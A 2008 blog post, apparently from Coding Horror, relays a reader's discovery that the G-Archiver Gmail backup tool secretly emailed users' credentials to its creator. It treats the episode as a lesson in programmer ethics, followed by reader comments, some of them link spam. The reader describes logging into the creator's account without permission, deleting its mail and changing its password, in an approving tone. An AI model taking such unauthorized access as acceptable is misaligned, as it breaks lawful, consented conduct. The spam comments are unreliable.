March 7, 2008
From the ACM Code of Ethics:
As an ACM member I will
- Contribute to society and human well-being.
- Avoid harm to others.
- Be honest and trustworthy.
- Be fair and take action not to discriminate.
- Honor property rights including copyrights and patent.
- Give proper credit for intellectual property.
- Respect the privacy of others.
- Honor confidentiality.
It's hard to square that with the following hair-raising tale Dustin Brooks sent me via email:
I was looking for a way to back up my gmail account to a local drive. I've accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I'll give it a try.
It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box! Having just entered my own information I became concerned.
I opened up a browser and logged in to gmail using his account information. It still worked.
Upon getting to the inbox I was greeted with 1,777 emails with account information for everyone who had ever used the software and right at the top was mine. I decided to go ahead and blast every email to the deleted folder and then empty it. I may have accidentally changed the password and security question to something I don't remember as well, whoops, my bad. I also contacted google to erase this account as I didn't see a way to delete it myself.
I generally try to give people the benefit of the doubt, but it's difficult to imagine any scenario where this isn't a completely malicious violation of people's trust. This is every user's greatest fear when giving out their login credentials, and to see it realized hurts the trust relationship between users and every other professional programmer working today. I've inadvertently posted my own login information to this very blog before. Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.
I certainly hope there are more programmers out there like Israel Orange than John Terry. Ethics matter for programmers, too.
Posted by Jeff Atwood
I had a similar problem, some of the comments above really helped!
I suppose the classic examples of unethical programming are the guys from EDS who wrote the software for SAVAK the Shah of Iran's secret polcie in the 1970s.
You're an honest man, Jeff. Nice work.
Why have you linked to the original application? I think it can only have bad consequences, like improving their google rank, or lead people who aren't really paying attention over to their site where they may download it.
ethical - conforming to accepted standards of social or professional behavior.
Neither act was ethical.
Agree with A. Programmer above; copyrights and patent are not property rights, and there is no such thing as "intellectual propertY".
Will Hughes wrote:
How many people, do you think, are going to actually check that the
source and binaries match, or compile it themselves from source?
Open Source Software is not the answer to preventing this kind of abuse
Please think about what you're writing before you write it. The proper question is not "how many people will check?", but "how many people have to check in order to expose it?". The answer is "only one", just like it only took one person to figure out what this program was doing.
It's interesting that this software is back - with a new homepage too.
And they have this response to the scandal - http://www.garchiver.com/what-happened.htm
Wtf! Do they seriously think this is going to give them their credibility back? Or maybe there are more gullibles out there than I think.
Arch2Arch is Memphis spa & threading salon providing services related to massage, eyebrow threading, facial, bridal makeup, henna tattoo & waxing. Arch 2 Arch is located on 3750 Hacks Cross Rd , Memphis,Tn. Visit our Memphis salon.
What concerns me after reading all the information, is what are little guys like me supposed to do with all the "free software" that we find and make available for others on sites such as http://TheSoftwareNet.com ??
Is there any place, or anyone, that now checks software for malicious coding practices? Perhaps someone that checks them on request?
I, for one, would not want to knowingly pass on free software that would be detrimental to the person downloading and using.
I realize this is two years since original post, but perhaps someone will notice and respond.
Wow! That's awful. In the Internet marketing industry the ethics issue comes up when you create software to sell and need to decide whether to link to your own sites for SEO purposes. That can be argued either way--but what this guy did is unacceptable.
The other issue is how to protect software and protect download files and pages. Most people don't know their digital products get stolen easily.
Get the free special report: How Digital Thieves Are Stealing 43% of Your eBooks and Software Profits From Right Under Your Nose…and What You Can Do To Stop Them Dead In Their Tracks! here: Protect Software
Good thing you changed the password to the account.So is John Terry walking scott-free ? I believe he has some explaining to do.
richmond sports medicine
This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash.
Wow, what an arse.
It's shocking what people get up to and how some spend their time trying to do someone else over.
I have run all kinds of online business' and one in particular is my Search Engines Business. This collects data using legal methods based on the people search industry.
This is all above board obviously but you would be horrified at some of the sites i have come across.
To answer Samrat Patil! No don't trust browsers. Our information is collected and used by google with the google chrome and google toolbar! Once installed you are being tracked.
Thanks for this great post!
I don't think that anything we post on the net is ever secretive, any decent programmer worth his weight in ale can hack a normal personal notebook or computer, its just really sad. My blog http://bangkokcurtains.wordpress.com/ talks about some of this in Thai language, not in English though.
Is it true that if hackers can really hack into any personal computer if they truly wanted to? Assuming they don't have a personal code of ethics? I have heard about how hackers have hacked into bank accounts to manipulate classified data and confidential information, where do they learn this stuff? NOT that I am interested in learning them, but seriously, with most of everyday financial transactions taking place online, it is truly a nightmare.
I wrote an essay in Thai about hackers in http://bkkcurtain.wordpress.com/ if anybody is interested, the english version is only about curtains, but the thai version contains all sorts of information about all kinds of topic. Programmers in Thailand are pretty good as well, and this is why I never conduct money transactions online.